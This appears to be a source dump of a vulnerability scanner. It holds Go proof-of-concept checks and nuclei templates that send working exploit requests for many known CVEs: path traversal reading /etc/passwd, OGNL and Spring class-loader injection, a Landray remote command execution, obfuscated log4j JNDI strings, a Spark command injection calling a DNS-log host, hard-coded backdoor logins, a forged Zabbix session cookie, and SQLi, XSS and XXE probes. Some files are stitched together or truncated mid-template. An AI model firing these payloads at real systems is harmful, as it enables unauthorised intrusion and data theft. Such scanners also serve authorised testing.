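	// unexpected reply cannot be buffered without limit.
	raw, err := ioutil.ReadAll(io.LimitReader(resp.Body, 64))
	if err != nil {
		return "", err
	}

	ip := strings.TrimSpace(string(raw))
	if net.ParseIP(ip) == nil {
		return "", fmt.Errorf("external ip lookup: response %q is not an ip address", ip)
	}
	return ip, nil
}
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/externalip_test.go:
--------------------------------------------------------------------------------
package scan

import (
	"testing"

	"github.com/stretchr/testify/assert"
)

// TestWhatsMyIP calls the real lookup, so it needs outbound network access.
func TestWhatsMyIP(t *testing.T) {
	externalIp, err := WhatsMyIP()
	assert.Nil(t, err)
	assert.NotEmpty(t, externalIp)
}
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/option.go:
--------------------------------------------------------------------------------
package scan

import (
	"time"
)

// Options of the scan
type Options struct {
	Timeout     time.Duration
	Retries     int
	Rate        int
	Debug       bool
	ExcludeCdn  bool
	ExcludedIps []string
	Proxy       string
	Stream      bool
}
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/tcpsequencer_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestTCPSequencer(t *testing.T) { 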
10 | tcpSequencer := NewTCPSequencer() 11 | // tcp sequencer should be uint32 incremental 12 | for i := 0; i < 50000; i++ { 13 | actual := tcpSequencer.Next() 14 | assert.Equal(t, uint32(i), actual) 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /pocs_go/Springboot/CVE-2022-22965.go: -------------------------------------------------------------------------------- 1 | package Springboot 2 | 3 | import ( 4 | "github.com/veo/vscan/pkg" 5 | ) 6 | 7 | func CVE_2022_22965(u string) bool { 8 | if req, err := pkg.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil { 9 | if req.StatusCode == 500 { 10 | if req2, err := pkg.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil { 11 | if req2.StatusCode == 200 { 12 | return true 13 | } 14 | } 15 | } 16 | } 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /pocs_go/confluence/CVE-2021-26085.go: -------------------------------------------------------------------------------- 1 | package confluence 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_26085(u string) bool { 10 | if req, err := pkg.HttpRequset(u+"/s/1/_/;/WEB-INF/web.xml", "GET", "", false, nil); err == nil { 11 | if strings.Contains(req.Body, "display-name") { 12 | pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2021_26085|--\"%s\"\n", u)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/confluence/CVE_2021_26084.go: -------------------------------------------------------------------------------- 1 | package confluence 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_26084(u string) bool { 10 | if req, err := pkg.HttpRequset(u+"/pages/doenterpagevariables.action", "POST", 
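"queryString=vvv\\u0027%2b#{342*423}%2b\\u0027ppp", false, nil); err == nil { 11 | if strings.Contains(req.Body, "342423") { 12 | pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2021_26084|--\"%s\"\n", u)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 |
--------------------------------------------------------------------------------
/pocs_go/confluence/CVE_2022_26318.go:
--------------------------------------------------------------------------------
package confluence

import (
	"fmt"

	"github.com/veo/vscan/pkg"
)

// author: penson (hard-coded added user)

// CVE_2022_26138 reports whether the target accepts a login with the
// hard-coded account: the POST to /dologin.action must come back as HTTP 302
// with the header X-Seraph-LoginReason set to "OK". A finding is logged only
// in that case.
//
// The function returns true only when both indicators are present. Returning
// true for any request that merely completed would flag every reachable host
// as vulnerable.
// NOTE(review): the file is named CVE_2022_26318 while the function and the
// log message use CVE_2022_26138; the file name looks like a digit
// transposition. Confirm and rename.
func CVE_2022_26138(u string) bool {
	headers := map[string]string{
		"Content-Type": "application/x-www-form-urlencoded",
	}
	req, err := pkg.HttpRequset(u+"/dologin.action", "POST", "os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=", false, headers)
	if err != nil {
		return false
	}
	if req.StatusCode == 302 && req.Header.Get("X-Seraph-LoginReason") == "OK" {
		pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2022_26138|--\"%s\"\n", u))
		return true
	}
	return false
}
--------------------------------------------------------------------------------
/pocs_go/f5/CVE_2020_5902.go:
--------------------------------------------------------------------------------
package f5

import (
	"fmt"
	"strings"

	"github.com/veo/vscan/pkg"
)

// CVE_2020_5902 reports whether the target answers the TMUI fileRead request
// with HTTP 200 and a body containing "root", logging a finding when it does.
//
// NOTE(review): a bare "root" substring is a loose indicator, since any 200
// page that mentions the word is reported. Consider matching a passwd-style
// entry instead, after confirming the response format on a known-affected
// lab system.
func CVE_2020_5902(u string) bool {
	req, err := pkg.HttpRequset(u+"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", "GET", "", false, nil)
	if err != nil {
		return false
	}
	if req.StatusCode == 200 && strings.Contains(req.Body, "root") {
		pkg.GoPocLog(fmt.Sprintf("Found F5 BIG-IP CVE_2020_5902|--\"%s\"\n", u))
		return true
	}
	return false
}
--------------------------------------------------------------------------------
/pocs_go/jboss/CVE_2017_12149.go: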
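--------------------------------------------------------------------------------
package jboss

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// CVE_2017_12149 requests /invoker/readonly and reports true when the server
// answers HTTP 500.
//
// NOTE(review): the status code is the only signal, so any endpoint that
// fails with 500 on this path is reported; confirm hits against the JBoss
// version before acting on them.
func CVE_2017_12149(url string) bool {
	resp, err := pkg.HttpRequset(url+"/invoker/readonly", "GET", "", false, nil)
	if err != nil || resp.StatusCode != 500 {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Jboss CVE_2017_12149|%s\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/jenkins/CVE_2018_1000110.go:
--------------------------------------------------------------------------------
package jenkins

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// CVE_2018_1000110 first confirms the target looks like Jenkins (a non-empty
// X-Jenkins-Session response header on u), then requests /search/?q=a and
// reports true when the body contains "Search for 'a'", i.e. the search page
// rendered for this unauthenticated request.
func CVE_2018_1000110(u string) bool {
	home, err := pkg.HttpRequset(u, "GET", "", false, nil)
	if err != nil || home.Header.Get("X-Jenkins-Session") == "" {
		return false
	}
	search, err := pkg.HttpRequset(u+"/search/?q=a", "GET", "", false, nil)
	if err != nil || !strings.Contains(search.Body, "Search for 'a'") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Jenkins CVE_2018_1000110|%s\n", u))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/landray/Landray_RCE.go:
--------------------------------------------------------------------------------
package landray

import (
	"fmt"
	"strings"

	"github.com/veo/vscan/pkg"
)

// Landray_RCE sends a script to /data/sys-common/datajson.js through the
// sysFormulaSimulateByJS bean and reports true when the response body
// contains the marker "模拟通过" ("simulation passed").
//
// The probe is not read-only: the script it submits asks the server to run
// `echo yes`, so a vulnerable host executes that command during the scan.
func Landray_RCE(u string) bool {
	payload := "s_bean=sysFormulaSimulateByJS&script=function%20test(){return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"echo%20yes\")&type=1"

	resp, err := pkg.HttpRequset(u+"/data/sys-common/datajson.js?"+payload, "GET", "", false, nil)
	if err != nil || !strings.Contains(resp.Body, "模拟通过") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Landray OA RCE|%s\n", u))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/log4j/payloads.go:
--------------------------------------------------------------------------------
package log4j

// log4jJndiPayloads lists the JNDI lookup strings used by the log4j check,
// from the plain form to variants that split the keywords with ${...:-}
// default-value lookups. "dnslog-url" is a placeholder; presumably the caller
// substitutes the callback host before sending (not visible in this file).
// The obfuscated variants are the forms a log or WAF rule has to normalise
// before matching on "jndi:".
var log4jJndiPayloads = []string{
	"${jndi:ldap://dnslog-url}",
	"${jndi:ldap:${::-/}${::-/}dnslog-url}",
	"${${X::-j}ndi:rmi:${::-/}${X::-/}dnslog-url}",
	"${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}dnslog-url}}",
}

--------------------------------------------------------------------------------
/pocs_go/mcms/Front_Desk_sqlinject.go:
--------------------------------------------------------------------------------
package mcms

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// Front_Sql_inject targets mcms 5.2.7 /cms/content/list. It posts a
// categoryId ending in a single quote and reports true when the response
// body contains "error in your SQL", i.e. the database error reached the
// client. The status code is not checked.
func Front_Sql_inject(u string) bool {
	resp, err := pkg.HttpRequset(u+"/cms/content/list", "POST", "categoryId=1'", false, nil)
	if err != nil || !strings.Contains(resp.Body, "error in your SQL") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found mcms_sql_inject|\"%s\"\n", u+"/cms/content/list|POST:categoryId"))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/phpunit/CVE_2017_9841.go:
--------------------------------------------------------------------------------
package phpunit

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// CVE_2017_9841 posts to the exposed eval-stdin.php under
// /vendor/phpunit/... and reports true on HTTP 200 with "PHP Version" in the
// body.
//
// The finding is now logged together with the target URL; the previous
// message named no host, unlike the sibling checks, so a hit could not be
// traced back to a system.
//
// NOTE(review): the request body is empty, so nothing is submitted for the
// endpoint to evaluate and the "PHP Version" marker depends on whatever the
// server returns by itself. Confirm that this check can fire at all.
func CVE_2017_9841(url string) bool {
	resp, err := pkg.HttpRequset(url+"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "POST", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "PHP Version") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln phpunit CVE_2017_9841|%s\n", url))
	return true
}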
--------------------------------------------------------------------------------
/pocs_go/seeyon/CNVD_2020_62422.go:
--------------------------------------------------------------------------------
package seeyon

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// CNVD_2020_62422 checks the webmail.do arbitrary file download: it asks
// doDownloadAtt for ../conf/datasourceCtp.properties and reports true on
// HTTP 200 with "workflow" in the body. The logged URL is the exact request
// that succeeded. A hit exposes the datasource configuration file, so
// anything stored in it should be treated as disclosed.
func CNVD_2020_62422(u string) bool {
	target := u + "/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties"
	resp, err := pkg.HttpRequset(target, "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "workflow") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon CNVD_2020_62422|%s\n", target))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/seeyon/DownExcelBeanServlet.go:
--------------------------------------------------------------------------------
package seeyon

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// DownExcelBeanServlet checks for sensitive user information disclosure via
// /yyoa/DownExcelBeanServlet. It reports true when the unauthenticated
// request returns HTTP 200 with a non-empty Content-disposition header,
// i.e. the servlet offered a download.
func DownExcelBeanServlet(u string) bool {
	target := u + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
	resp, err := pkg.HttpRequset(target, "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || resp.Header.Get("Content-disposition") == "" {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon DownExcelBeanServlet|%s\n", target))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/seeyon/GetSessionList.go:
--------------------------------------------------------------------------------
package seeyon

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// GetSessionList checks for the getSessionList.jsp session leak. It reports
// true when /yyoa/ext/https/getSessionList.jsp?cmd=getAll returns HTTP 200
// with "sessionID" in the body. On a hit the listed sessions should be
// considered exposed and invalidated.
func GetSessionList(u string) bool {
	target := u + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
	resp, err := pkg.HttpRequset(target, "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "sessionID") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon GetSessionList|%s\n", target))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/seeyon/InitDataAssess.go:
--------------------------------------------------------------------------------
package seeyon

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// InitDataAssess checks for sensitive user information disclosure via
// initDataAssess.jsp. It reports true when /yyoa/assess/js/initDataAssess.jsp
// returns HTTP 200 with "personList" in the body.
func InitDataAssess(u string) bool {
	target := u + "/yyoa/assess/js/initDataAssess.jsp"
	resp, err := pkg.HttpRequset(target, "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "personList") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon InitDataAssess|%s\n", target))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/seeyon/ManagementStatus.go:
--------------------------------------------------------------------------------
package seeyon

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// ManagementStatus checks for information disclosure on the A8
// status-monitoring page. It posts the password WLCCYBD@SEEYON to
// /seeyon/management/index.jsp and reports true when the server answers 302
// with a Location containing "status", i.e. the password was accepted.
// On a hit the monitoring password should be changed.
func ManagementStatus(u string) bool {
	target := u + "/seeyon/management/index.jsp"
	resp, err := pkg.HttpRequset(target, "POST", "password=WLCCYBD@SEEYON", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 302 || !strings.Contains(resp.Location, "status") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon ManagementStatus|pssword:WLCCYBD@SEEYON|%s\n", target))
	return true
}
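--------------------------------------------------------------------------------
/pocs_go/seeyon/sql.go:
--------------------------------------------------------------------------------
package seeyon

// Placeholders only: no check is implemented in this file.
// - A6 test.jsp SQL injection vulnerability
// - A6 setextno.jsp SQL injection vulnerability

--------------------------------------------------------------------------------
/pocs_go/spark/CVE_2022_33891.go:
--------------------------------------------------------------------------------
package spark

import (
	"fmt"
	"time"

	"github.com/veo/vscan/pkg"
)

// CVE_2022_33891 is an out-of-band check: it puts a ping to a random
// subdomain of pkg.CeyeDomain into the doAs parameter of /jobs/, waits three
// seconds, and reports true when pkg.Dnslogchek sees a lookup for that
// random label. It returns false without sending anything when pkg.CeyeApi
// or pkg.CeyeDomain is empty.
func CVE_2022_33891(u string) bool {
	if pkg.CeyeApi == "" || pkg.CeyeDomain == "" {
		return false
	}
	randomstr := pkg.RandomStr()
	payload := fmt.Sprintf("doAs=`ping%%20%s`", randomstr+"."+pkg.CeyeDomain)
	// The HTTP result is deliberately ignored: the verdict comes from the DNS
	// callback, which can still arrive when the request itself errors.
	_, _ = pkg.HttpRequset(u+"/jobs/?"+payload, "GET", "", false, nil)
	time.Sleep(3 * time.Second)
	if !pkg.Dnslogchek(randomstr) {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Apache Spark CVE_2022_33891|%s\n", u))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/tomcat/CVE_2017_12615.go:
--------------------------------------------------------------------------------
package tomcat

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// CVE_2017_12615 sends a PUT of the body "test" to /vtset.txt and reports
// true when the server answers 201 or 204, i.e. the write was accepted.
//
// The probe is not read-only: a vulnerable server keeps vtset.txt after the
// scan. The log line now names the path that was actually written (it used
// to say vtest.txt), so the artifact can be found and removed.
func CVE_2017_12615(url string) bool {
	const probePath = "/vtset.txt"
	resp, err := pkg.HttpRequset(url+probePath, "PUT", "test", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 204 && resp.StatusCode != 201 {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Tomcat CVE_2017_12615|--\"%s%s\"\n", url, probePath))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/tongda/api_ali_php_any_fileUpload.go:
--------------------------------------------------------------------------------
package tongda

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// File_upload targets the Tongda OA V11.8 api.ali.php arbitrary file upload.
// It reports true when a GET of /mobile/api/api.ali.php returns HTTP 200.
//
// NOTE(review): this only shows that the endpoint exists; no upload is
// attempted and the version is not checked, so a hit needs confirmation.
func File_upload(url string) bool {
	resp, err := pkg.HttpRequset(url+"/mobile/api/api.ali.php", "GET", "", false, nil)
	if err != nil || resp.StatusCode != 200 {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln tongda-OA upload in api.ali.php | \"%s\"\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/tongda/file_delete.go:
--------------------------------------------------------------------------------
package tongda

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// File_delete targets the Tongda OA V11.6 arbitrary file deletion. It
// requests print.php with a traversal-style guid and reports true when the
// response body contains "未知参数" ("unknown parameter"). The status code is
// not checked.
func File_delete(url string) bool {
	resp, err := pkg.HttpRequset(url+"/module/appbuilder/assets/print.php?guid=../../../1", "GET", "", false, nil)
	if err != nil || !strings.Contains(resp.Body, "未知参数") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found tongda-OA file delete in print.php you can try to upload|%s\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/tongda/get_user_session.go:
--------------------------------------------------------------------------------
package tongda

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"regexp"
)

// Get_user_session targets the Tongda OA V11.6 arbitrary user login. It
// requests /inc/auth.inc.php and reports true when the body contains a
// "code_uid":"{...}" value.
//
// Two things changed: the regexp error is no longer discarded (a pattern
// error now gives false instead of being ignored), and the log line carries
// the target URL, where it used to print a fixed hint and name no host.
func Get_user_session(url string) bool {
	resp, err := pkg.HttpRequset(url+"/inc/auth.inc.php", "GET", "", false, nil)
	if err != nil {
		return false
	}
	matched, err := regexp.MatchString("\"code_uid\":\"{.*?}\"", resp.Body)
	if err != nil || !matched {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln tongda-OA any_user_Login | \"%s\"\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/weblogic/CVE_2014_4210.go: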
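--------------------------------------------------------------------------------
package weblogic

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// CVE_2014_4210 reports true when /uddiexplorer/SearchPublicRegistries.jsp
// returns HTTP 200.
//
// NOTE(review): this shows that the UDDI explorer page is reachable, not
// that the flaw is present; confirm hits against the WebLogic patch level.
func CVE_2014_4210(url string) bool {
	resp, err := pkg.HttpRequset(url+"/uddiexplorer/SearchPublicRegistries.jsp", "GET", "", false, nil)
	if err != nil || resp.StatusCode != 200 {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2014_4210|%s\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/weblogic/CVE_2018_2894.go:
--------------------------------------------------------------------------------
package weblogic

import (
	"fmt"
	"github.com/veo/vscan/pkg"
)

// CVE_2018_2894 reports true when either Web Service Test Page endpoint,
// /ws_utc/begin.do or /ws_utc/config.do, returns HTTP 200.
//
// Each endpoint is now judged on its own. Before, a transport error on
// either request discarded a 200 from the other, although the condition was
// written as "either one is enough".
func CVE_2018_2894(url string) bool {
	for _, path := range []string{"/ws_utc/begin.do", "/ws_utc/config.do"} {
		resp, err := pkg.HttpRequset(url+path, "GET", "", false, nil)
		if err != nil || resp.StatusCode != 200 {
			continue
		}
		pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2018_2894|%s\n", url))
		return true
	}
	return false
}

--------------------------------------------------------------------------------
/pocs_go/weblogic/CVE_2020_14882.go:
--------------------------------------------------------------------------------
package weblogic

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// CVE_2020_14882 requests console.portal through a double-encoded "../"
// under /console/css/ and reports true on HTTP 200 with "/console/dashboard"
// in the body, i.e. console content was served to this unauthenticated
// request. The doubly encoded %252e%252e%252f sequence in the request path
// is the string to look for in access logs.
func CVE_2020_14882(url string) bool {
	resp, err := pkg.HttpRequset(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a", "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "/console/dashboard") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2020_14882|%s\n", url))
	return true
}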
--------------------------------------------------------------------------------
/pocs_go/weblogic/CVE_2021_2109.go:
--------------------------------------------------------------------------------
package weblogic

import (
	"fmt"
	"github.com/veo/vscan/pkg"
	"strings"
)

// CVE_2021_2109 requests consolejndi.portal through a double-encoded "../"
// under /console/css/ and reports true on HTTP 200 with "Weblogic" in the
// body.
//
// NOTE(review): "Weblogic" is a generic marker; a hit shows that the portal
// page was served without authentication and needs confirmation against the
// patch level.
func CVE_2021_2109(url string) bool {
	resp, err := pkg.HttpRequset(url+"/console/css/%252e%252e%252f/consolejndi.portal", "GET", "", false, nil)
	if err != nil {
		return false
	}
	if resp.StatusCode != 200 || !strings.Contains(resp.Body, "Weblogic") {
		return false
	}
	pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2021_2109|%s\n", url))
	return true
}

--------------------------------------------------------------------------------
/pocs_go/zabbix/CVE-2022-23131.go:
--------------------------------------------------------------------------------
package zabbix

import (
	"github.com/veo/vscan/pkg"
	"strings"
)

// CVE_2022_23131 sends a fixed zbx_session cookie to /index_sso.php and
// reports true when the server answers 302 with a Location containing
// "zabbix.php?action", i.e. the cookie was accepted and the request was
// redirected into the application.
//
// Unlike most checks in this tree, it writes no GoPocLog entry; presumably
// the caller records the result (not visible here).
func CVE_2022_23131(zabbixurl string) bool {
	header := map[string]string{
		"Cookie": "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9",
	}
	resp, err := pkg.HttpRequset(zabbixurl+"/index_sso.php", "GET", "", false, header)
	if err != nil {
		return false
	}
	return resp.StatusCode == 302 && strings.Contains(resp.Location, "zabbix.php?action")
}

-------------------------------------------------------------------------------- /pocs_go/zentao/CNVD_2022_42853.go: -------------------------------------------------------------------------------- 1 | package zentao 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/veo/vscan/pkg" 8 | ) 9 | 10 | // zentao/user-login.html SQL注入 11 | 12 | func CNVD_2022_42853(u string) bool { 13 | payload := "account='" 14 | 15 | header := make(map[string]string) 16 | header["Referer"] = u + "/zentao/user-login.html" 17 | if response, err := 
pkg.HttpRequset(u+"/zentao/user-login.html", "POST", payload, false, header); err == nil { 18 | if response.StatusCode == 200 && strings.Contains(response.Body, "You have an error in your SQL syntax;") { 19 | pkg.GoPocLog(fmt.Sprintf("Found vuln zentao CNVD-2022-42853|%s\n", u+"/zentao/user-login.html")) 20 | return true 21 | } 22 | } 23 | return false 24 | } 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/cnvd/2018/CNVD-2018-13393.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2018-13393 2 | 3 | info: 4 | name: Metinfo LFI 5 | author: ritikchaddha 6 | severity: high 7 | reference: 8 | - https://paper.seebug.org/676/ 9 | tags: metinfo,cnvd,cvnd2018,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "(.*?)" 21 | - "(.*?)" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/cves/2018/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI 8 | classification: 9 | cve-id: CVE-2018-16341 10 | tags: cve,cve2018,nuxeo,ssti,rce,bypass 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 16 | matchers: 17 | - type: word 18 | words: 19 | - "31333333337" 20 | part: body 21 | -------------------------------------------------------------------------------- 
/pocs_yml/nucleiFiles/default-logins/openwrt/openwrt-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: openwrt-default-login 2 | 3 | info: 4 | name: Opentwrt Default Login 5 | author: For3stCo1d 6 | severity: high 7 | reference: 8 | - https://forum.archive.openwrt.org/viewtopic.php?id=16611 9 | metadata: 10 | shodan-query: http.title:"OpenWrt - LuCI" 11 | tags: openwrt,default-login 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/cgi-bin/luci" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - 'cgi-bin/luci/admin/system/admin' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/generic/basic-xss-prober.yaml: -------------------------------------------------------------------------------- 1 | id: basic-xss-prober 2 | 3 | info: 4 | name: Basic XSS Prober 5 | author: nadino,geeknik 6 | severity: low 7 | tags: xss,generic 8 | 9 | # Basic XSS prober 10 | # Manual testing needed for exploitation 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "\">" 22 | part: body 23 | 24 | - type: word 25 | words: 26 | - "text/html" 27 | part: header 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/generic/generic-blind-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: generic-blind-xxe 2 | 3 | info: 4 | name: Generic Blind XXE 5 | author: geeknik 6 | severity: high 7 | tags: xxe,generic,blind 8 | 9 | requests: 10 | - raw: 11 | - | 12 | POST / HTTP/1.1 13 | Host: {{Hostname}} 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 15 | Referer: {{BaseURL}} 16 | 17 | 18 | 19 | &e1; 20 | 21 | 
matchers: 22 | - type: word 23 | part: interactsh_protocol 24 | words: 25 | - "http" 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/httpbin/httpbin-open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: httpbin-open-redirect 2 | 3 | info: 4 | name: HTTPBin - Open Redirect 5 | author: Adam Crosser 6 | severity: low 7 | reference: 8 | - https://github.com/postmanlabs/httpbin 9 | metadata: 10 | shodan-query: 11 | - html:"https://github.com/requests/httpbin" 12 | - title:"httpbin.org" 13 | tags: redirect,httpbin,oss 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh" 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: dsl 23 | dsl: 24 | - 'location == "https://interact.sh"' 25 | 26 | - type: status 27 | status: 28 | - 302 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/huawei/huawei-hg255s-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-hg255s-lfi 2 | 3 | info: 4 | name: Huawei HG255s - Directory Traversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2017090053 9 | - https://www.youtube.com/watch?v=n02toTFkLOU 10 | metadata: 11 | shodan-query: http.html:"HG532e" 12 | tags: huawei,lfi,router 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/ibm/eclipse-help-system-xss.yaml: 
